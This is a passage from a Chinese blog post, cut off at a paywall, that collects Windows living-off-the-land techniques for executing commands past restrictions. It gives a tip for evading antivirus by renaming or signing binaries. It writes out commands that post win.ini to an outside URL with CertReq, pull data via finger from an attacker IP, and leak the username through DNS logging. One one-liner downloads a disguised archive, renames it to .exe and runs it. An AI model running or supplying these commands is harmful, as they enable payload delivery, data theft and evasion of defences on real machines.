本文总结了多种在Windows环境下绕过限制执行命令的方法,包括使用Pcalua、elevate.exe、diskshadow.exe等非标准模块,以及Bitsadmin、Certutil等常用工具。还探讨了通过加载DLL文件、利用各种编程语言如PowerShell、Perl执行远程命令,以及利用InfDefaultInstall.exe、Cmstp.exe等不同文件后缀格式进行命令执行。这些技巧在安全测试和Web安全领域有重要应用。
参考资料
https://toutiao.io/posts/uh65arq/preview
https://www.freebuf.com/system/232074.html
https://lolbas-project.github.io/
小Tips
针对一些杀软,可以cp到别的文件夹,然后重命名,或添加一些签名,可能可以运行下载的指令
半路收集的
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
finger kali@192.168.180.190 | more +8 >1.txt
https://www.slashroot.in/finger-server-configuration-linux。
0、浏览器
start firefox http://xxxxxx/demo.rar
start chrome http://xxxxxx/demo.rar
start msedge http://xxxxxx/demo.rar
上面三种都会默认下载到C:\Users\username\Downloads 这个目录下, username 是当前用户名称
ping %USERNAME%.xxx.xx.dnslog.cn 可以获取到用户名 拼接即可
一条命令
start msedge http://xxxxx/123123123.rar && ping -n 10 127.0.0.1 >NUL && for /f %k in ('cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "123123123.rar""') do set kk=%k && (set dd=%kk:123123123.rar=123456.exe%) && rename %k 123456.exe && ping -n 10 127.0.0.1 >NUL && cmd /c %dd%
除了cmd /c 以外可以直接跟命令执行的
1、Pcalua
Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的⼀个组件。
pcalua.exe 
最低0.47元/天 解锁文章
扫一扫
450
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
